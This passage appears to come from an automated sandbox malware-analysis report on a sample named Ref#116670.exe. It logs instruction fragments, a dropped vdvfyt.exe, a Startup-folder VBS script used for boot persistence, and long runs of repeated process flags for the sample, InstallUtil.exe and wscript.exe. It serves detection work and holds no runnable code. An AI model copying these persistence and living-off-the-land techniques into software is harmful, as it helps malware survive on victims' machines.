                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A1B014 push FFFFFF8Bh; ret 0_2_06A1B016
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A1B18B push FFFFFF8Bh; iretd 0_2_06A1B18F
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06A10D10 push es; retf 0_2_06A10D34
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D78E9E pushad ; retf 0_2_06D78E9F
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D742BB pushad ; retf 0_2_06D742BC
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D786AF pushad ; retf 0_2_06D786B0
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D772AA pushad ; retf 0_2_06D772AB
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D73258 pushad ; retf 0_2_06D73259
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D71A78 pushad ; retf 0_2_06D71A79
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D78617 pushad ; retf 0_2_06D78618
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D72E19 pushad ; retf 0_2_06D72E1A
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D72FC7 pushad ; retf 0_2_06D72FC8
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D73FE1 pushad ; retf 0_2_06D73FE2
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D72BEE pushad ; retf 0_2_06D72BEF
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D72B84 pushad ; retf 0_2_06D72B85
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D78F1B pushad ; retf 0_2_06D78F1C
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D71B1A pushad ; retf 0_2_06D71B1B
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D78725 pushad ; retf 0_2_06D78726
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D788CC pushad ; retf 0_2_06D788CD
                    Source: C:\Users\user\Desktop\Ref#116670.exeCode function: 0_2_06D740B2 pushad ; retf 0_2_06D740B3
                    Source: C:\Users\user\Desktop\Ref#116670.exeFile created: C:\Users\user\AppData\Roaming\vdvfyt.exeJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\Desktop\Ref#116670.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to dropped file
                    Source: C:\Users\user\Desktop\Ref#116670.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbsJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Ref#116670.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
